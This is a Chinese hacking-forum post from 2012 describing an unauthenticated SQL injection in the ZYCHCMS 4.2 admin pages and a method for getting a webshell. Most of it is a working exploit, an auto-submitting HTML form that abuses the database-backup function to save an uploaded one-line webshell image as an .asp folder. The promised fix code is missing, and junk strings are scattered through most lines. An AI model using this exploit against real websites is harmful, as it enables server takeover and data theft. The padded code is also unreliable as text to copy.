找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1854|回复: 0
打印 上一主题 下一主题

ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:09:51 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
+ L9 N, i$ P+ b9 I; Q- L" W

& V" I- G9 d5 q5 h; `* m
8 F; t& c9 ^/ {- g* J2 L
9 S3 _) Q1 h& j+ C3 p影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)$ ^2 b! J; O* T
①SQL注射漏洞
0 n4 S. D* W' d2 z% Z 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp  P4 |4 z+ g5 P4 I! H7 j
漏洞原因:未过滤2 D% D+ J2 V- h$ m7 O1 I; Z$ y
漏洞代码:
* J/ j7 Z) L/ h5 @0 i3 L/ B 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。9 @7 d3 U% }2 F/ _1 N8 ?7 U0 W
修复方法:在文件开头加入代码
" y2 K5 p4 ^! a1 _' N5 s& V
2 p6 Z$ Z3 @- W2 l6 Q' X# i% x0 `0 V, U/ a
②后台拿WBSHELL% a$ p9 m2 E" f+ N1 F6 n
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
7 _& L, c! J0 n6 W 这里在网上找了一个,改了下,将就着用。0 f' l' P1 x6 `/ }4 R: K: X
以下是代码本地提交代码
, e) d8 D$ O+ j  ]6 w; V# K 4 L9 K3 u! ~  F1 G% u" B. \
# Z" U+ V& _9 E% Y5 Q7 L
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>4 ^3 K- g  s* a( B# r3 S: h+ ^
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
0 m5 m* D$ @. {1 O: o <tr>
. x! F" J2 `5 L( }. w/ d+ ]7 R4 u <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
1 ?$ z) N) m) J# I; ~; e </tr>: F$ w" m: F6 k! c- g
<tr>
0 j2 d' u, ^: j8 F <td bgcolor=”#FFFFFF”><span class=”back_southidc”>" u7 w% K# Y1 B. s
</span>
5 K( G: H6 s2 D5 R9 g0 q: | <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >' I( j: U5 Q0 d
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >7 I* s% g$ ~# {# y
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>+ E# e% i; I$ h1 T
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d9 \; Y2 f% n: K" l9 E3 F
<div align=”left”>3 o+ {; h7 ]+ v$ ~, D
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />+ c% ^# ^3 D/ L
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
4 j! ], j: }$ n7 ~  n <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
3 E' K$ Z. M0 s: @' @; D </div></td>, G7 V; U+ K/ C
</tr>
2 B- J" `; k/ ^; k' u' ?9 L3 k <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>! j6 {9 c+ T( H* y) b% F
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
1 ^. m* q) \2 Z% B7 \6 ~ <td class=”td”><div align=”left”>* q. [* _7 N( Z& W0 e6 u
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />, t7 E& Q( b8 Y) a* ]' h* w
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
) B+ V6 }: t( {- O/ i! s" D </tr>
# k* A, m. o, `5 v; B& E <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
% F- {, D5 o! H7 X' d4 ^ <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>3 Q  C# K. c% I8 i1 K
<td class=”td”><div align=”left”>
0 O  A1 X. r+ F7 G/ _- A+ n& M <input type=”submit” value=”确定备份” class=”btn”
( C/ y" ]7 F: U4 i" ?2 ~ </div></td>0 K' H: o7 S7 P4 X8 i( \; |1 v
</tr>
: T' G) E' Q$ N% w </table></td></tr></form>% C* E. z3 p" I  q! ~1 R
</table>  K& C8 V. N+ J, q5 ~
</td>  S# q9 q) E7 A' F& G# a/ L# v* G
</tr>2 v" H# z; k" j; m& P  ^8 z) f
</table>
* Q7 [/ ]7 B! ~# q <script># A. i. Z: r" O7 i+ J( V: \1 v' q4 q
document.all.add.submit();
( Q2 \5 `3 Z. v9 R </script>
$ M: m/ f; s1 V% l; @1 y  b; @- Q7 V ) R7 b$ Q  T; o
! ~" Q' L( C2 [
* C2 I4 y2 s# Y) ]; c

* c, {; x3 e0 Z1 f7 V, V' o: P; Q& z3 [% a1 X( [$ s

7 a9 s( b3 n( P# T0 c. k0 a
: m, {# c9 q% X1 o: V' H* [! m! h6 B
" U2 p# K7 _4 k9 g3 |3 u

1 k0 u/ B6 E/ ^- E8 G; A. b! L" c3 l
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表